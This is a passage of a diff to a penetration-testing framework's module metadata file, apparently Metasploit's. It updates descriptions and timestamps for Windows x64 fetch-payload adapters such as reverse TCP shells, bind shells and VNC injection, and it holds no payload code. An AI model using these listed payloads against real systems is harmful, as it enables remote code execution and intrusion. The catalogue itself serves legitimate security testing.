"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/shell/bind_named_pipe",
|
||||
@@ -202480,7 +202841,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -202490,7 +202851,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/shell/bind_tcp",
|
||||
@@ -202526,7 +202887,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -202536,7 +202897,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/shell/bind_tcp_rc4",
|
||||
@@ -202568,7 +202929,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -202578,7 +202939,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/shell/bind_tcp_uuid",
|
||||
@@ -202609,7 +202970,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -202619,7 +202980,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/shell/reverse_tcp",
|
||||
@@ -202655,7 +203016,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -202665,7 +203026,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/shell/reverse_tcp_rc4",
|
||||
@@ -202697,7 +203058,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -202707,7 +203068,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/shell/reverse_tcp_uuid",
|
||||
@@ -202738,7 +203099,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for a connection and spawn a command shell (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection and spawn a command shell (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -202748,7 +203109,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/shell_bind_tcp",
|
||||
@@ -202777,7 +203138,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to attacker and spawn a command shell (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a command shell (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -202787,7 +203148,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/shell_reverse_tcp",
|
||||
@@ -202816,7 +203177,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -202827,7 +203188,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/vncinject/bind_ipv6_tcp",
|
||||
@@ -202859,7 +203220,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -202870,7 +203231,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/vncinject/bind_ipv6_tcp_uuid",
|
||||
@@ -202902,7 +203263,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -202913,7 +203274,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/vncinject/bind_named_pipe",
|
||||
@@ -202944,7 +203305,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -202955,7 +203316,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/vncinject/bind_tcp",
|
||||
@@ -202991,7 +203352,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -203002,7 +203363,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/vncinject/bind_tcp_rc4",
|
||||
@@ -203034,7 +203395,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -203045,7 +203406,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/vncinject/bind_tcp_uuid",
|
||||
@@ -203077,7 +203438,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -203088,7 +203449,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/vncinject/reverse_http",
|
||||
@@ -203122,7 +203483,7 @@
|
||||
"agix",
|
||||
"rwincey"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -203133,7 +203494,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/vncinject/reverse_https",
|
||||
@@ -203164,7 +203525,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -203175,7 +203536,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/vncinject/reverse_tcp",
|
||||
@@ -203211,7 +203572,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -203222,7 +203583,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/vncinject/reverse_tcp_rc4",
|
||||
@@ -203254,7 +203615,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -203265,7 +203626,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/vncinject/reverse_tcp_uuid",
|
||||
@@ -203297,7 +203658,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -203308,7 +203669,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/vncinject/reverse_winhttp",
|
||||
@@ -203340,7 +203701,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -203351,7 +203712,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/vncinject/reverse_winhttps",
|
||||
@@ -203383,7 +203744,7 @@
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203393,7 +203754,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/custom/bind_ipv6_tcp",
|
||||
@@ -203426,7 +203787,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203436,7 +203797,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/custom/bind_ipv6_tcp_uuid",
|
||||
@@ -203468,7 +203829,7 @@
|
||||
"bwatters-r7",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203478,7 +203839,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/custom/bind_named_pipe",
|
||||
@@ -203510,7 +203871,7 @@
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nCustom shellcode stage.\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203520,7 +203881,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/custom/bind_tcp",
|
||||
@@ -203557,7 +203918,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nCustom shellcode stage.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203567,7 +203928,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/custom/bind_tcp_rc4",
|
||||
@@ -203600,7 +203961,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203610,7 +203971,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/custom/bind_tcp_uuid",
|
||||
@@ -203642,7 +204003,7 @@
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203652,7 +204013,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/custom/reverse_http",
|
||||
@@ -203686,7 +204047,7 @@
|
||||
"agix",
|
||||
"rwincey"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203696,7 +204057,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/custom/reverse_https",
|
||||
@@ -203728,7 +204089,7 @@
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203738,7 +204099,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/custom/reverse_named_pipe",
|
||||
@@ -203770,7 +204131,7 @@
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203780,7 +204141,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/custom/reverse_tcp",
|
||||
@@ -203817,7 +204178,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nCustom shellcode stage.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203827,7 +204188,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/custom/reverse_tcp_rc4",
|
||||
@@ -203860,7 +204221,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203870,7 +204231,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
